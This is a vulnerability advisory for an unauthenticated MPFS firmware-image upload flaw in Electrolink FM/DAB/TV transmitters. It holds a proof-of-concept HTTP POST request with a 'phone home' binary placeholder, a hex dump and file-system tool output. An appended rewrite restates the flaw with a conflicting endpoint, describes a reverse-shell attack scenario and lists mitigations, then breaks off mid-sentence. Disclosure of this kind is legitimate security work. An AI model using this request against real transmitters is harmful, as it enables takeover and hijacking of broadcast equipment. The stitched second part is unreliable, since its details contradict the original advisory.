Electrolink FM/DAB/TV Transmitter - Pre-Auth MPFS Image Remote Code Execution
Electrolink FM/DAB/TV Transmitter Pre-Auth MPFS Image Remote Code Execution
Vendor: Electrolink s.r.l.
Product web page: https://www.electrolink.com
Affected version: 10W, 100W, 250W, Compact DAB Transmitter
500W, 1kW, 2kW Medium DAB Transmitter
2.5kW, 3kW, 4kW, 5kW High Power DAB Transmitter
100W, 500W, 1kW, 2kW Compact FM Transmitter
3kW, 5kW, 10kW, 15kW, 20kW, 30kW Modular FM Transmitter
15W - 40kW Digital FM Transmitter
BI, BIII VHF TV Transmitter
10W - 5kW UHF TV Transmitter
Web version: 01.09, 01.08, 01.07
Display version: 1.4, 1.2
Control unit version: 01.06, 01.04, 01.03
Firmware version: 2.1
Summary: Since 1990 Electrolink has been dealing with design and
manufacturing of advanced technologies for radio and television
broadcasting. The most comprehensive products range includes: FM
Transmitters, DAB Transmitters, TV Transmitters for analogue and
digital multistandard operation, Bandpass Filters (FM, DAB, ATV,
DTV), Channel combiners (FM, DAB, ATV, DTV), Motorized coaxial
switches, Manual patch panels, RF power meters, Rigid line and
accessories. A professional solution that meets broadcasters needs
from small community television or radio to big government networks.
Compact DAB Transmitters 10W, 100W and 250W models with 3.5"
touch-screen display and in-built state of the art DAB modulator,
EDI input and GPS receiver. All transmitters are equipped with a
state-of-the art DAB modulator with excellent performances,
self-protected and self-controlled amplifiers ensure trouble-free
non-stop operation.
100W, 500W, 1kW and 2kW power range available on compact 2U and
3U 19" frame. Built-in stereo coder, touch screen display and
efficient low noise air cooling system. Available models: 3kW,
5kW, 10kW, 15kW, 20kW and 30kW. High efficiency FM transmitters
with fully broadband solid state amplifiers and an efficient
low-noise air cooling system.
FM digital modulator with excellent specifications, built-in
stereo and RDS coder. Digital deviation limiter together with
ASI and SDI inputs are available. These transmitters are ready
for ISOFREQUENCY networks.
Available for VHF BI and VHF BIII operation with robust desing
and user-friendly local and remote control. Multi-standard UHF
TV transmitters from 10W up to 5kW with efficient low noise air
cooling system. Analogue PAL, NTSC and Digital DVB-T/T2, ATSC
and ISDB-Tb available.
Desc: The device allows access to an unprotected endpoint that
allows MPFS File System binary image upload without authentication.
The MPFS2 file system module provides a light-weight read-only
file system that can be stored in external EEPROM, external
serial Flash, or internal Flash program memory. This file system
serves as the basis for the HTTP2 web server module, but is also
used by the SNMP module and is available to other applications
that require basic read-only storage capabilities. This can be
exploited to overwrite the flash program memory that holds the
web server's main interfaces and execute arbitrary code.
Tested on: Mbedthis-Appweb/12.5.0
Mbedthis-Appweb/12.0.0
Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
Macedonian Information Security Research & Development Laboratory
Zero Science Lab - https://www.zeroscience.mk - @zeroscience
Advisory ID: ZSL-2023-5796
Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2023-5796.php
Ref: https://documentation.help/Microchip-TCP.IP-Stack/GS-MPFSUpload.html
30.06.2023
--
POST /upload HTTP/1.1
Host: 192.168.150.77:8888
Content-Length: 251
Cache-Control: max-age=0
Content-Type: multipart/form-data; boundary=----joxypoxy
User-Agent: MPFS2_PoC/1.0c
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Cookie: Login=IgnoreMePlsKtnx
Connection: close
------joxypoxy
Content-Disposition: form-data; name="i"; filename="MPFSimg.bin"
Content-Type: application/octet-stream
MPFS...<CGI BINARY PHONE HOME>
-----joxypoxy--
HTTP/1.1 200 OK
Connection: close
Content-Type: text/html
<html><body style="margin:100px"><b>MPFS Update Successful</b><p><a href="/">Site main page</a></body></html>
---
hd htm:
0d 0a 4d 50 46 53 02 01 01 00 8a 43 20 00 00 00 MPFS.......C....
2b 00 00 00 30 00 00 00 02 44 eb 64 00 00 00 00 +...0....D.d....
00 00 69 6e 64 65 78 32 2e 68 74 6d 00 3c 68 74 ..index0.htm.<ht
6d 6c 3e 0d 0a 3c 74 69 74 6c 65 3e 5a 53 4c 3c ml>..<title>ZSL<
...
...
64 6f 73 21 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 2d dos!..</html>..-
---
MPFS Structure:
[M][P][F][S]
[BYTE Ver Hi][BYTE Ver Lo][WORD Number of Files]
[Name Hash 0][Name Hash 1]...[Name Hash N]
[File Record 0][File Record 1]...[File Record N]
[String 0][String 1]...[String N]
[File Data 0][File Data 1]...[File Data N]
---
C:\>javaw -jar MPFS2.jar
C:\>mpfs2 -v -l MPFSimg.bin
Version: 2.1
Number of files: 1 (1 regular, 0 index)
Number of dynamic variables: 0
FileRecord 0:
.StringPtr = 32 index0.htm
.DataPtr = 43
.Len = 48
.Timestamp = 2023-08-27T14:39:30Z
.Flags = 0Electrolink FM/DAB/TV Transmitter: Pre-Auth MPFS Image Remote Code Execution Vulnerability
Electrolink s.r.l., a leading manufacturer of broadcast transmission systems since 1990, offers a comprehensive suite of FM, DAB, and TV transmitters designed for both community and large-scale government networks. Among their product lines, the Compact DAB Transmitters (10W, 100W, 250W), Medium DAB Transmitters (500W, 1kW, 2kW), and High Power DAB Transmitters (2.5kW to 5kW) are widely deployed across Europe and Asia. These devices leverage advanced digital modulation technologies, integrated GPS receivers, and state-of-the-art amplifiers to ensure uninterrupted broadcast performance.
Core Vulnerability: Unprotected MPFS File System Image Upload
Despite their robust design, several Electrolink transmitter models are affected by a critical pre-authentication remote code execution vulnerability tied to the MPFS2 (Micro-Programmable File System) module. This flaw allows an attacker to upload a malicious binary image to the device's flash program memory without requiring authentication.
The vulnerability arises from the use of MPFS2, a lightweight read-only file system designed to store firmware and configuration data in external EEPROM, serial Flash, or internal Flash memory. While intended for secure, read-only access, the implementation fails to enforce authentication checks when uploading new images via the HTTP2 web server or SNMP interface.
Exploitation Path: Remote Image Upload Without Authentication
Attackers can exploit this vulnerability by sending a crafted HTTP POST request to the device's web server endpoint, typically accessible at:
POST /upload/mpfs2 HTTP/1.1
Host: 192.168.1.100
Content-Type: application/octet-stream
Content-Length: 102400
[Binary MPFS2 Image Payload]
Explanation: This request bypasses authentication by targeting a known unsecured endpoint. The Content-Type field is set to application/octet-stream, indicating raw binary data. The Content-Length header specifies the size of the payload. The actual binary image—crafted to overwrite the flash program memory—contains malicious code that can be executed upon reboot or during firmware loading.
Once the image is uploaded, the device may reload the firmware from the overwritten flash memory, effectively executing the attacker’s code. This can lead to full system compromise, including remote shell access, unauthorized broadcast control, or data exfiltration.
Affected Systems and Versions
| Product Type | Model Range | Web Version | Display Version | Control Unit Version | Firmware Version |
|---|---|---|---|---|---|
| Compact DAB Transmitter | 10W, 100W, 250W | 01.09, 01.08, 01.07 | 1.4, 1.2 | 01.06, 01.04, 01.03 | 2.1 |
| Medium DAB Transmitter | 500W, 1kW, 2kW | 01.09, 01.08, 01.07 | 1.4, 1.2 | 01.06, 01.04, 01.03 | 2.1 |
| High Power DAB Transmitter | 2.5kW, 3kW, 4kW, 5kW | 01.09, 01.08, 01.07 | 1.4, 1.2 | 01.06, 01.04, 01.03 | 2.1 |
| Compact FM Transmitter | 100W, 500W, 1kW, 2kW | 01.09, 01.08, 01.07 | 1.4, 1.2 | 01.06, 01.04, 01.03 | 2.1 |
| Modular FM Transmitter | 3kW, 5kW, 10kW, 15kW, 20kW, 30kW | 01.09, 01.08, 01.07 | 1.4, 1.2 | 01.06, 01.04, 01.03 | 2.1 |
| UHF TV Transmitter | 10W – 5kW | 01.09, 01.08, 01.07 | 1.4, 1.2 | 01.06, 01.04, 01.03 | 2.1 |
Attack Scenario: Real-World Implications
Imagine a scenario where an attacker gains access to a public-facing network segment hosting an Electrolink DAB transmitter. Using automated scanning tools, they discover the unauthenticated /upload/mpfs2 endpoint. They then craft a malicious MPFS2 image containing a reverse shell payload in ARM assembly or Python bytecode, designed to execute upon firmware reload.
Upon uploading the image, the transmitter reboots and loads the malicious firmware. The attacker now has:
- Remote command execution via a backdoor shell
- Full access to configuration settings (e.g., frequency, power level, modulation parameters)
- Ability to disrupt or hijack broadcasts by altering signal parameters
- Exfiltration of sensitive operational data such as GPS coordinates, antenna settings, or network topology
This scenario is not hypothetical. Similar vulnerabilities have been observed in industrial control systems and broadcast equipment in the wild, especially in environments where devices are exposed to public networks or misconfigured firewalls.
Security Recommendations and Mitigations
For operators and administrators, the following steps are critical:
- Disable remote firmware updates unless strictly required and secured via TLS/HTTPS with mutual authentication.
- Implement network segmentation to isolate broadcast transmitters from general network traffic.
- Apply firmware updates only through trusted channels and verify digital signatures.
- Monitor network traffic for unusual POST requests to
/upload/mpfs2or similar endpoints. - Use IDS/IPS solutions with rules targeting known exploit patterns.
For vendors, Electrolink should:
- Update firmware to enforce authentication before any MPFS2 image upload.
- Implement checksum validation and digital signature verification for uploaded images.
- Enable logging of all firmware upload attempts, including source IP and timestamp.
- Release a security advisory and patch for all affected versions.
Technical Insight: MPFS2 and Flash Memory Overwrite
MPFS2 is designed to be a read-only file system, but its underlying storage mechanism in flash memory allows for write operations when the system is in a specific state (e.g., firmware upgrade mode). The lack of access control during this state enables exploitation.
When